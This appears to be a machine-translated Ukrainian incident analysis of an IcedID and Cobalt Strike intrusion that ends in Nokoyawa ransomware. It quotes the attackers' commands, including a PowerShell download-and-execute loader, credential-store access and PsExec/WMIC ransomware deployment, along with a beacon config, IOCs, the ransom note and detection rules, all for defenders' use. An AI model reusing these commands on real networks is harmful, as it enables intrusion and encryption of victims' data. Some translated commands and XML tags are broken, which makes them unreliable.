Новий зловмисний метод: Від HTML до вірусу-вимагача Nokoyawa

25 вересня 2023 10 хвилин Автор: Cyber Witcher

Контрабанда HTML: Поширення вірусу-вимагача Nokoyawa

Сучасний ландшафт кібербезпеки заснований на незліченних вимогах та небезпеках, що призводять до постійних інновацій у світі кіберзлочинності. Кіберзлочинці постійно шукають нові та винахідливі способи здійснення атак і отримання несанкціонованого доступу до цінних даних та ресурсів. У такому контексті, інциденти, пов’язані з використанням HTML-макросів та вірусів-вимагачів, зокрема Nokoyawa, набувають особливого значення. Ця стаття присвячена аналізу одного з нових та небезпечних методів атаки, який включає в себе використання HTML-макросів та вірусів-вимагачів для вторгнення та поширення загрози. Ми вивчимо цей інцидент без використання конкретних прикладів, але зосередимося на загальних характеристиках та етапах атаки. HTML-макроси: Вхідна ворожа точка. HTML-макроси, відомі також як макроси веб-сторінок, раніше використовувалися для реалізації функціональності на веб-сайтах та в електронних документах.

Однак з часом кіберзлочинці виявили спосіб використання цих макросів як засіб для створення ефективних атак. Інцидент, який ми розглядаємо, розпочався з електронної доставки HTML-файлу, який призвів до запуску атаки. Під час аналізу виявлено, що ця доставка відбулася через електронну пошту, що робить цей метод атаки особливо небезпечним. Контрабанда HTML: Засіб обману. HTML-файл, відкритий користувачем, спричинив відображення підробленої сторінки Adobe та завантаження ZIP-архіву. Один з основних аспектів цього етапу атаки – це використання методу, відомого як контрабанда HTML. Основна ідея полягає в тому, що користувач бачить фіктивну сторінку, тоді як за кулісами відбувається завантаження шкідливого вмісту. ZIP-архів містив зашифрований пароль, який був призначений для захисту від автоматизованого аналізу шкідливого вмісту. Це був лише перший крок у спритному плані кіберзлочинців. Від ZIP до Nokoyawa: Внутрішній зміст. Усередині ZIP-архіву містився файл формату ISO. Та ось основна хитрість – він містив у собі корисне навантаження зловмисного програмного забезпечення, але цей файл був прихований за шаром захисту. Для розкриття цього шару, зловмисники використали LNK-файл, який маскувався під документ. І коли користувач натиснув на цей LNK-файл, було виконано послідовність команд, яка включала копіюван ня шкідливого вмісту із ISO-файлу на хост перед запуском зловмисного програмного забезпечення. Вірус-вимагач Nokoyawa: Завершальний акт. Після завантаження шкідливої DLL було встановлено з’єднання з командним та контрольним серверами IcedID, що є ще однією загрозою в цьому інциденті. Користувач, тим часом, бачив легітимне зображення фінансового документа, а не відображення атаки. Зловмисники також використовували різні інструменти та команди для виявлення і розгортання свого шкідливого програмного забезпечення. Вони маневрували у мережі та використовували різні методи для намагань отримати несанкціонований доступ та здійснити атаки.

Резюме справи

На початку листопада 2022 року вторгнення почалося з доставки HTML-файлу. Ми з високою впевненістю оцінюємо, що доставка була електронною поштою, як повідомлялося в інших публічних звітах . Цей файл HTML використовував техніку, відому як контрабанда HTML. Це один із методів, до якого звернулися зловмисники після того, як корпорація Майкрософт оновила стандартні параметри керування макросами. Буквально місяць тому цей загрозливий діяч спостерігався за допомогою макросів Excel у надзвичайно подібній кампанії .

Коли користувач відкривав HTML-файл, відображалася підроблена сторінка Adobe і завантажувався ZIP-файл. Adobe lure містить пароль для ZIP як спосіб захисту шкідливого вмісту від автоматизованого аналізу. Всередині ZIP був файл ISO. Всередині ISO було корисне навантаження зловмисного програмного забезпечення. Єдиним видимим для користувача файлом був файл LNK, який маскувався під документ.

Коли користувач натискав файл LNK, виконувалася серія команд. Це включало копіювання rundll32 і шкідливої ​​DLL з ISO на хост перед запуском шкідливого програмного забезпечення. Після завантаження шкідливої ​​DLL було встановлено з’єднання з командними та контрольними серверами IcedID. Тим часом користувач отримав легітимне зображення фінансового документа.

Коли зловмисну ​​DLL було виконано, постійність також була встановлена ​​через заплановане завдання на базовому хості. Це завдання було встановлено для запуску зловмисного програмного забезпечення IcedID щогодини на хості. Початкові команди виявлення було запущено через кілька секунд після звернення до сервера команд і керування.

Приблизно через три години після виконання початкового зловмисного програмного забезпечення IcedID з IcedID був породжений процес cmd. Цей новий процес почав передавати сигнали на сервер Cobalt Strike. Потім цей процес спостерігався під час доступу до LSASS, імовірно, для доступу до облікових даних. Також спостерігалася швидка перевірка адміністраторів домену за допомогою net.

Потім практичні дії призупинилися приблизно на три години, перш ніж актор, що загрожує, повернувся. Використовуючи маяк Cobalt Strike, зловмисник шукав певних адміністраторів домену за допомогою утиліти net. Використовуючи один із цих облікових записів, зловмисник ініціював сеанс RDP, щоб перейти до контролера домену. Використовуючи цей сеанс, актор загрози скопіював маяк Cobalt Strike на контролер домену та виконав його.

Після цього зловмисник продовжив дії виявлення, виконавши пакетний файл на контролері домену, який запускав звичайну батарею команд виявлення Active Directory за допомогою AdFind. Після завершення результати команд виявлення архівувалися за допомогою 7-Zip. Після цього зловмисник запустив другий пакетний файл, який ітерував по мережі, виконуючи nslookup для кожного хоста в середовищі.

Приблизно через п’ять годин зловмисник повернувся до контролера домену та виконав закодовану команду PowerShell, яка була SessionGopher. SessionGopher — це інструмент, який знаходить і розшифровує збережену інформацію про сеанс для інструментів віддаленого доступу. Потім зловмисник увійшов на додаткові хости через RDP, включаючи резервний сервер і сервер із спільними файлами. На сервері резервного копіювання зловмисник відкрив консоль резервного копіювання. Перебуваючи на спільному файлі, вони використовували блокнот для перегляду файлу на хості.

Зловмисник повернувся до контролера домену та використав Netscan для сканування мережі. Після сканування PsExec і WMIC використовувалися для переміщення файлів між системами в мережі. Скопійовані ключові файли включали k.exe та p.bat. Ці два файли були двійковим файлом програми-вимагача та пакетним сценарієм, який використовуватиметься для виконання програми-вимагача.

Через п’ять хвилин після передачі файлів на хости в домені двійковий файл програми-вимагача Nokoyawa був запущений на контролері домену. У той же час PsExec використовувався для виконання файлу p.bat, який запускає двійковий файл програми-вимагача на інших хостах у домені. Час до програм-вимагачів (TTR) становив трохи більше 12 годин після початкового зараження.

Атрибуція

У цьому випадку ми бачимо двох різних суб’єктів загрози; дистриб’ютор і актор, який тримає руки на клавіатурі. Proofpoint відстежує цього дистриб’ютора як TA551 . Актор, який працює на клавіатурі, відстежується корпорацією Майкрософт як Storm-0390, яка є командою «перевірки пера» під керівництвом Periwinkle Tempest (раніше відстежувався як Storm-0193 і DEV-0193).

Помічено, що афілійована програма-вимагач використовує RDP у середовищі з імені сервера WIN-5J00ETD85P5. Це ім’я сервера збігається з ім’ям, яке використовує загроза з  попередньої справи Nokoyawa . За допомогою інструментів інтернет-сканування ми бачимо, що це ім’я хосту наразі активне на 78.128.113[.]154, розміщеному на AS209160 Miti2000 на 4vendeta.com у Болгарії.

Початковий доступ

Для цієї кампанії для доставки шкідливого HTML-файлу використовувалися зламані електронні листи. За даними Proofpoint, ця кампанія була пов’язана з групою розповсюдження, яку вони відстежують як TA551. Подяка Proofpoint за наведений нижче приклад.

Після завантаження та відкриття файлу HTML він завантажив захищений паролем ZIP-файл із випадковою назвою. Користувачеві було надано пароль для розпакування файлу. На наступному зображенні показано файл HTML, відкритий у браузері.

Файл ISO з архіву zip під час монтування містив 1 видимий файл LNK (documents-9771) і 3 прихованих файли: demurest.cmd, pimpliest_kufic.png і templates544.png.

Після виконання відкривається законне зображення, щоб змусити користувача подумати, що нічого страшного.

Виконання

Файл ISO містив файл LNK із піктограмою зображення, яке спонукало користувача клацнути його. Коли користувач відкривав файл LNK, виконувався пакетний сценарій demurest.cmd.

Пакетний сценарій у файлі demurest.cmd зробив наступне:

  1. Відкрито pimpliest_kufic.png, у якому показано зображення.

  2. Для копіювання rundll32.exe до %temp%\entails.exe використовувалася утиліта Windows xcopy.

  3. Створив рядок «templates544.png» у середовищі виконання та скопіював його з випадковим числом у форматі: RANDOM_NUM.RANDOM_NUM.

  4. templates544.png був DLL IcedID і виконувався через entails.exe.

Ми бачимо з пам’яті ( MemProcFS ), cmd виконує entails.exe, який виконує IcedID dll, переглядаючи командний рядок. Ми також можемо побачити ланцюжок викликів cmd->entails.exe з головним батьківським процесом explorer.exe.

Приблизно через шість годин після вторгнення 1.dll (Cobalt Strike) було скинуто на плацдарм, а потім скопійовано на контролер домену. Після перенесення 1.dll на контролер домену його було виконано через rundll32.exe за допомогою такої команди:

rundll32.exe 1.dll, DllRegisterServer

Наполегливість

IcedID зареєстрував заплановане завдання для отримання стійкості на плацдармі, яке запускалося щогодини.

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Реєстраційна інформація>
    <URI>\{E5C1C7DB-E36E-5B16-8E3A-6226D7E53A67}</URI>
  </RegistrationInfo>
  <Тригери>
    <TimeTrigger id="TimeTrigger">
      <Повторення>
        <Інтервал>PT1H</Інтервал>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2012-01-01T12:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
    <LogonTrigger id="LogonTrigger">
      <Enabled>true</Enabled>
      <UserId>ВИДАЛЕНО</UserId>
    </LogonTrigger>
  </Triggers>
  <Директори>
    <Принципал id="Автор">
      <RunLevel>Найвищий доступний</RunLevel>
      <UserId>ВИДАЛЕНО</UserId>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Налаштування>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <Duration>PT10M</Duration>
      <WaitTimeout>PT1H</WaitTimeout>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Пріоритет>7</Пріоритет>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>rundll32.exe</Command>
      <Аргументи>"C:\Users\REDACTED\AppData\Local\REDACTED\Izjeubaw64.dll",#1 --oyxo="EdgeDecrease\license.dat"</Arguments>
    </Exec>
  </Actions>
</Task>

Ми також можемо побачити подібну інформацію в пам’яті, переглядаючи нещодавно створені заплановані завдання:

Підвищення привілеїв

Зламаний користувач мав права локального адміністратора на своєму комп’ютері, що дозволяло зловмиснику використовувати інструменти, які потребують вищих дозволів.

Ухилення від захисту

Переглядаючи вміст шкідливого файлу HTML, ми можемо виявити контрабанду HTML у коді. По-перше, дивлячись на <script>теги, ми приходимо до наступного:

Якщо ми візьмемо цей блок даних, декодуємо його вміст за допомогою base64 і експортуємо його у файл, ми зможемо знайти заархівований файл ISO, прихований у документі:

Заголовок PK вказує, що дані є початком файлу zip , а наведені нижче дані показують, що вміст є файлом ISO.

Початковий пакет доступу від загрози використовував утиліту Windows xcopy для перейменування rundll32.exe на entails.exe. Ймовірно, це уникає логіки виявлення, заснованої на виконанні командного рядка. Entails.exe, який завантажував IcedID DLL, потім було помічено введення в процес cmd.exe на базовому хості.

Нижче ми можемо побачити завантажувач IcedID у пам’яті в процесі entails.exe:

Процес entails.exe спочатку відкрив cmd.exe із GrantedAccess 0x1fffff, який відповідає правам PROCESS_ALL_ACCESS , а потім виклик CreateRemoteThread, який був записаний Sysmon Event ID 10 і 8 відповідно, як показано нижче:

Ми також бачимо з пам’яті, beacon.dll було введено в cmd.

Під час сканування пам’яті процесу cmd.exe спрацювало правило YARA win_cobalt_strike_auto від Malpedia. Наступну конфігурацію маяка Cobalt Strike було витягнуто з пам’яті процесу:

"BeaconType": "windows-beacon_https-reverse_https",
"Порт": 443,
«Час сну»: 60000,
"Maxgetsize": 1048576,
"Джиттер": 0,
"MaxDns": 0,
«PublicKey»: «30 81 9f 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 81 8d 00 30 81 89 02 81 81 00 a7 38 cd e7 5f 1f bb 1c 18 64 6c 37 7e 03 01 6b 16 2b 12 ba 72 bd f7 dc 36 b4 cd 2e 4e 9b ae 12 20 5a 95 c2 61 70 bf 90 81 05 ad 7f a4 bb cc fa 79 86 32 26 1b ed 98 70 f9 75 f2 07 94 e1 fe 49 95 23 d7 1f 08 a5 6c ae 03 15 bf de 3d 6c 8a 16 38 6b 03 b7 a6 55 1a a1 33 6d 50 32 5a 35 00 db 27 d7 8a d8 fd 13 b6 a7 3b 9f b7 c3 fb 4d 7a 08 8 е 32 3f 07 61 86 56 ec d8 35 95 fa 5f 82 36 13 02 03 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0 0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00",
"c2_server": "5.8.18.242,/pixel.gif",
"UserAgent": "Mozilla/4.0 (сумісний; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
"PostURI": "/submit.php",
"Malleable_C2_Instructions2": "",
"HttpGetHeader": "Cookie",
"HttpPostHeader": "\n\u0026Content-Type: application/octet-streamid",
"SpawnTo": "",
"Назва каналу": "",
"KillDateYear": 0,
"KillDateMonth": 0,
"KillDateDay": 0,
"DNSIdle": "0.0.0.0",
"DNSSleep": 0,
"SSH_1": "",
"SSH_2": "",
"SSH_3": "",
"SSH_4": "",
"SSH_5": "",
"GetVerb": "ОТРИМАТИ",
"PostVerb": "POST",
"HttpPostChunk": 0,
"SpawnTox86": "%windir%\\syswow64\\rundll32.exe",
"SpawnTox64": "%windir%\\sysnative\\rundll32.exe",
"Криптосхема": 0,
"Проксі": "",
"ProxyUsername": "",
"ProxyPassword": "",
"ProxyType": "Налаштування IE",
"Застарілий": 0,
"LicenseId": 305419776,
"bStageCleanup": 0,
"bCFGCaution": 0,
"KillDate": 0,
"TextSectionEnd": 0,
"ObfuscateSectionsInfo": "",
"ProcessInjectStartRWX": "PAGE_EXECUTE_READWRITE",
"ProcessInjectUseRWX": "PAGE_EXECUTE_READWRITE",
"ProcessInjectMinAlloc": 0,
"ProcessInjectTransformx86": "",
"ProcessInjectTransformx64": "",
"Використовує файли cookie": 1,
"ProcessInjectExecute": "",
"ProcessInjectAllocationMethod": 0,
"ProcessInjectStub": "b5 4a fe 01 ec 6a 75 ed f3 5e 1a 44 f8 bd 39 29",
"HostHeader": ""

IP та порт відповідають тому, що ми бачимо в пам’яті:

Введений cmd.exe, у свою чергу, вставляється в rundll32.exe.

Обліковий доступ

Схоже, що Cobalt Strike використовувався для доступу до простору пам’яті LSASS. Наданий доступ був 0x1010 & 0x1fffff. Ці значення можна використовувати для ідентифікації доступу за обліковими даними.

Труби були створені з префіксом “postex_” Cobalt Strike за замовчуванням.

На одному з контролерів домену було помічено, що закодована команда PowerShell виконується з маяка Cobalt Strike.

Після декодування ця команда показала виконання сценарію SessionGopher .

IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:8897/'); Invoke-SessionGopher

Відкриття

Після завантаження IcedID DLL через перейменований rundll32 на хості плацдарму спостерігалися такі команди виявлення:

cmd.exe /c chcp >&2
ipconfig /все
системна інформація
робоча станція net config
nltest /domain_trusts
nltest /domain_trusts /all_trusts
net view /все /домен
net view /все
net група «Адміністратори домену» /domain

У рамках команд виявлення IcedID використовував WMI, щоб отримати список антивірусних продуктів, встановлених на базовому хості, за допомогою такої команди:

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Шлях AntiVirusProduct Get * /Format:List

Зловмисник також запустив такі команди виявлення через cmd.exe (введений процес Beacon):

net group "адміністратори домену" /domain
net user [ВИДАЛЕНО АДМІНІСТРАТОРА ДОМЕНУ] /домен
net user Адміністратор/домен
net user [ВИДАЛЕНО АДМІНІСТРАТОРА ДОМЕНУ] /домен
cmd.exe /C каталог *.txt
cmd.exe /C каталог *.dll

AdFind використовувався для виявлення на контролері домену за допомогою пакетного сценарію під назвою adfind.bat. Сценарій виконував такі команди:

adfind.exe -f (objectcategory=person) > ad_users.txt
adfind.exe -f objectcategory=computer > ad_computers.txt
adfind.exe -f (objectcategory=organizationalUnit) > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet) > ad_subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt
7.exe a -mx3 ad.7z ad_*
del 7.exe adfind* ad_*

Після цього зловмисник скинув новий пакетний файл ns.bat. Цей файл містив список хостів у мережі для виконання DNS-пошуку за допомогою nslookup.

C:\Windows\system32\cmd.exe /C ns.bat 
nslookup [ВИДАЛЕНО ХОСТ X] 
... 
nslookup [ВИДАЛЕНО ХОСТ XX]

Незадовго до початку розгортання програми-вимагача зловмисник підключився до резервного сервера та відкрив консоль резервного копіювання на хості. Після цього було виконано остаточне виявлення на контролері домену за допомогою інструменту SoftPerfect Netscan , який використовувався для остаточного сканування виявлення в мережі.

Бічний рух

Зловмисник підключився до різних хостів у мережі через тунель RDP через процес маяка на головному хості.

Ми можемо знайти ім’я хоста загрози, присутнє в деяких журналах Windows, ідентифікатори події 4624, 4776, 4778 і 4779.

WIN-5J00ETD85P5

Назва робочої станції, помічена в події 4624 на плацдармі:

Знову в події 4776 від контролера домену:

І знову 4778, а потім 4779 на контролері домену:

Під час сеансу RDP 1.dll (Cobalt Strike DLL) було передано з плацдарму через Провідник файлів Windows.

Подібним чином остаточні файли, які використовувалися для виконання розгортання програми-вимагача, були передані таким же чином, що можна побачити в процесі реєстрації створення файлу як Explorer.EXE.

Після того, як k.exe і p.bat, а також різні інші пакетні сценарії було передано на скомпрометований контролер домену, зловмисник спробував скопіювати k.exe на інші комп’ютери в мережі за допомогою команди копіювання , виконаної на контролері домену.

Можливо, це виконання команди не спрацювало належним чином, або як резервну копію актор загрози знову запустив команду копіювання, але цього разу замість виконання cmd /K copyна контролері домену вони запустили wmic для виконання команди копіювання з віддаленого хосту.

Цей процес було повторено для p.bat, це повторення вказує на те, що це був сценарій, а не невдале виконання процесу копіювання.

Спочатку скопіюйте команду, видану на контролер домену:

По-друге, скопіюйте команду за допомогою WMIC, щоб віддалені хости запустили команду.

Після того як k.exe і p.bat було скопійовано на комп’ютери в мережі, зловмисник використовував PsExec.exe, щоб віддалено створити службу під назвою mstdc для запуску p.bat (p.bat запускає k.exe, який шифрує систему на основі конфігурації в кодуванні Base64) через системний обліковий запис.

На кожному хості, що приймає PsExec, створено файл «.key». Ім’я файлу містить ім’я хоста машини, яка ініціювала PsExec.

Колекція

Після завершення роботи AdFind результати архівувалися за допомогою 7-Zip.

Командування і контроль

IcedID Після того, як entails.exe (rundll32.exe) успішно виконав templates544.png на базовому хості, було встановлено вихідне з’єднання з trentonkaizerfak[.]com.

Це завантажило файл gzip для наступного етапу IcedID. Після виконання цього корисного навантаження командування та керування було встановлено для 5.255.103[.]16

Cobalt Strike

Після впровадження в cmd.exe на базовому хості було створено 1.dll (Cobalt Strike DLL), який пізніше було передано на контролер домену. Потім 1.dll було виконано на контролері домену через rundll32.exe, і після виконання rundll32.exe підключився до командного та контрольного сервера 5.8.18[.]242.

Вплив

Було помічено, що зловмисник розгортає програму-вимагач Nokoyawa у всьому середовищі, використовуючи як PSExec, так і WMIC.

psexec.exe \\[ЦІЛЬОВА IP-адреса] -u [ДОМЕН]\[КОРИСТУВАЧ] -p "[ПАРОЛЬ]" -s -d -h -r mstdc -accepteula -nobanner c:\windows\temp\p.bat

wmic /node:"[TARGET IP]" /user:"[DOMAIN]\[USER]" /password:"[PASSWORD]" виклик процесу create "cmd.exe /cc:\windows\temp\p.bat"

Це дублювання виконання за допомогою як PsExec, так і WMIC відображає подвоєні команди, які використовуються для копіювання файлів у мережі, вказуючи на виконання за сценарієм для резервування.

Пакетний файл (p.bat) відповідає за виконання двійкового файлу програми-вимагача (k.exe) разом із його конфігураціями.

c:\windows\temp\k.exe --config ВИДАЛЕНО

Після перегляду конфігурації, наданої в параметрах команди, ця програма-вимагач налаштована на шифрування мережі, завантаження прихованих дисків і видалення тіньових копій томів.

Крім того, конфігурація інформує двійковий файл програми-вимагача пропускати наступні каталоги та розширення файлів.

Виключені каталоги
- Вікна
- Програмні файли
- Програмні файли (x86)
- Дані програми
- ProgramData
- Інформація про системний том

Виключені розширення файлів
- .exe
- .dll
- .ini
- .lnk
- .url
- ""

Примітка про викуп.

Нокоява.

Якщо ви бачите це, ваші файли були успішно зашифровані.
Радимо не шукати безкоштовний метод дешифрування.
Це неможливо. Ми використовуємо симетричне та асиметричне шифрування.

УВАГА:
    - Не перейменовуйте зашифровані файли.
    - Не змінюйте зашифровані файли.
    - Не використовуйте стороннє програмне забезпечення.
    
Для досягнення згоди пропонуємо вам відвідати наш сайт Onion.
Як відкрити посилання Onion:
    - Завантажте браузер TOR з офіційного сайту.
    - Відкрийте та введіть це посилання:
        http://[ВИДАЛЕНО]
    - На сторінці ви побачите чат зі службою підтримки.
    - Надішліть своє перше повідомлення.
    
Чим швидше ви зв’яжетеся з нами, тим швидше ви отримаєте рішення.

Хронологія

Діамантова модель

Індикатори

Атомний

Кобальтовий удар:
  5.8.18.242:443

IcedID:
  trentonkaizerfak[.]com на 159.89.12.125:80
  questdisar[.]com за адресою 5.255.103.16:443
  pikchayola[.]фотографії на 5.255.103.16:443

Обчислений

1.dll
9740f2b8aeacc180d32fc79c46333178
c599c32d6674c01d65bff6c7710e94b6d1f36869
d3db55cd5677b176eb837a536b53ed8c5eabbfd68f64b88dd083dc9ce9ffb64e

8c11812d-65fd-48ee-b650-296122a21067.zip
4f4231ca9e12aafac48a121121c6f940
7bd217554749f0f3c31957a37fc70d0a86e71fc3
be604dc018712b1b1a0802f4ec5a35b29aab839f86343fc4b6f2cb784d58f901

adfind.bat
ebf6f4683d8392add3ef32de1edf29c4
444c704afe4ee33d335bbdfae79b58aba077d10d
2c2513e17a23676495f793584d7165900130ed4e8cccf72d9d20078e27770e04

demurest.cmd
586fe6d361ef5208fad28c5ff8a4579b
bf4177381235393279e7cdfd45a3fa497b7b8a96
364d346da8e398a89d3542600cbc72984b857df3d20a6dc37879f14e5e173522

документи-9771.lnk
51e416c3d3be568864994449cd39caa1
ee1c5e9f1257fbda3b174d534d06dddf435d3327
57842fe8723ed6ebdf7fc17fc341909ad05a7a4feec8bdb5e062882da29fa1a8

k.exe
40c9dc2897b6b348da88b23deb0d3952
0f5457b123e60636623f585cc2bf2729f13a95d6
7095beafff5837070a89407c1bf3c6acf8221ed786e0697f6c578d4c3de0efd6

netscan.exe
16ef238bc49b230b9f17c5eadb7ca100
a5c1e4203c740093c5184faf023911d8f12df96c
ce6fc6cca035914a28bbc453ee3e8ef2b16a79afc01d8cb079c70c7aee0e693f

p.bat
385d21c0438f5b21920aa9eb894740d2
5d2c17799dfc6717f89cd5f63951829aed038041
e351ba5e50743215e8e99b5f260671ca8766886f69d84eabb83e99d55884bc2f

psexec.exe
c590a84b8c72cf18f35ae166f815c9df
b97761358338e640a31eef5e5c5773b633890914
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

pimpliest_kufic.png
49524219dbd2418e3afb4e49e5f1805e
b8cb71c48a7d76949c93418ddd0bcae587bef6cc
c6294ebb7d2540ee7064c60d361afb54f637370287983c7e5e1e46115613169a

redated-invoice-10.31.22.html
c8bdc984a651fa2e4f1df7df1118178b
f62b155ab929b7808de693620d2e9f07a9293926
31cd7f14a9b945164e0f216c2d540ac87279b6c8befaba1f0813fbad5252248b

templates544.png
14f37c8690dda318f9e9f63196169510
306e4ede6c7ea75ef5841f052f9c40e3a761c177
e71772b0518fa9bc6dddd370de2d6b0869671264591d377cdad703fa5a75c338

Виявлення

Мережа

ET HUNTING Підозрілий порожній сертифікат SSL - спостерігається в Cobalt Strike
ET INFO RDP - відповідь на зовнішній хост
ET MALWARE Meterpreter або інший сертифікат зворотної оболонки SSL
ET MALWARE Win32/IcedID Request Cookie
ET ПОЛІТИКА OpenSSL Demo CA - Internet Widgits Pty (O)
Створено службу ET POLICY PsExec
ET ПОЛІТИКА SMB Передача виконуваних файлів
ПОЛІТИКА ET SMB2 NT Створення запиту AndX для файлу .bat
ПОЛІТИКА ET SMB2 NT Створення запиту AndX для файлу DLL - можливий бічний рух
ПОЛІТИКА ET SMB2 NT Створення запиту AndX для виконуваного файлу
ПОЛІТИКА ET SMB2 NT Створення запиту AndX для виконуваного файлу в каталозі Temp
ET RPC DCERPC SVCCTL – доступ диспетчера віддаленого керування службами
ET SCAN Поведінка Незвичайний трафік Порт 135 Потенційне сканування або зараження
ET SCAN Поведінка Незвичайний трафік Порт 445 Потенційне сканування або зараження
ET SCAN Поведінковий Незвичайно швидкий трафік сервера терміналів Потенційне сканування або зараження (вхідний)
ET SCAN Поведінковий Незвичайно швидкий трафік сервера терміналів Потенційне сканування або зараження (вихідний)

Сигма

Репо звіту DFIR:

CHCP CodePage Locale Lookup dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f
AdFind Discovery 50046619-1037-49d7-91aa-54fc92923604

Sigma Repo:

Поганий Opsec за замовчуванням жертвуючі процеси з неправильними аргументами a7c3d773-caef-227e-a7e7-c2f13c622329
Змініть політики PowerShell на незахищений рівень 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180
CMD Shell Output Redirect 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a
Схема впорскування CobaltStrike BOF 09706624-b7f6-455d-9d02-adee024cee1d
Перший раз побачений віддалений канал з назвою 52d8b0c6-53d6-439a-9e41-52ad442ad9ad
Файл ISO, створений у тимчасових папках 2f9356ae-bf43-41b8-b858-4496d83b2acb
ISO Image Mount 0248a7bc-8a9a-4cd8-a57e-3ae8e073a073
Новий процес, створений через Wmic.EXE 526be59f-a573-4eea-b5f7-f0973207634d
Net.exe Виконання 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac
Неінтерактивний процес PowerShell породив f4bbd493-b796-416e-bbf2-121235348529
Потенційне ухилення від оборони через перейменування дуже релевантних двійкових файлів 0ba1da6d-b6ce-4366-828c-18826c9de23e
Потенційне виконання інструментів Sysinternals 7cccd811-7ae9-4ebe-9afd-cb5c406b824b
Потенційна розвідувальна діяльність через Nltest.EXE 5cc90652-4cbd-4241-aa3b-4b462fa5a248
Створення процесу за допомогою папки Sysnative 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab
Виконання Psexec 730fc21b-eaff-474b-ad23-90fd265d4988
Виконання Rundll32 без файлу DLL c3a99af4-35a9-4668-879e-c09aeb4f2bdf
Спільний доступ і перерахування сеансів за допомогою Net.EXE 62510e69-616b-4078-b371-847da438cc03
SMB Create Remote File Admin Share b210394c-ba12-4f89-9117-44a2464b9511
Підозрілий виклик за порядковим номером e79a9e79-eb72-4e78-a628-0e7e8f59e89c
Підозріле копіювання з або до System32 fff9d2b7-e11c-4a69-93d3-40ef66189767
Підозріло закодований командний рядок PowerShell ca2092a1-c273-4878-9b4b-0d60115bf5ea
Підозріле виконання імені хосту 7be5fb68-f9ef-476d-8b51-0256ebece19e
Розвідка підозрілої групи та облікового запису за допомогою Net.EXE d95de845-b83c-4a9a-8a6a-4fc802ebf6c0
Підозріла маніпуляція обліковими записами за замовчуванням через Net.EXE 5b768e71-86f2-4879-b448-81061cbae951
Підозріла мережева команда a29c1813-ab1f-4dde-b489-330b952e91ae
Підозрілий процес, створений через Wmic.EXE 3c89a1e8-0fba-449e-8f1b-8409d6267ec8
Підозрілий Rundll32 без будь-яких параметрів командного рядка 1775e15e-b61b-4d14-a1a3-80981298085a
Виконання дистанційної команди WMIC 7773b877-5abb-4a3e-b9c9-fd0369b59b00
WmiPrvSE створив процес d21374ff-f574-44a7-9998-4a8c8bf33d7d
Труба під назвою CobaltStrike d5601f8c-b26f-4ab0-9035-69e11a8d4ad2
Підозріле виконання Systeminfo 0ef56343-059e-4cb6-adc1-4c3c967c5e46
Інші статті по темі
Знайшли помилку?
Якщо ви знайшли помилку, зробіть скріншот і надішліть його боту.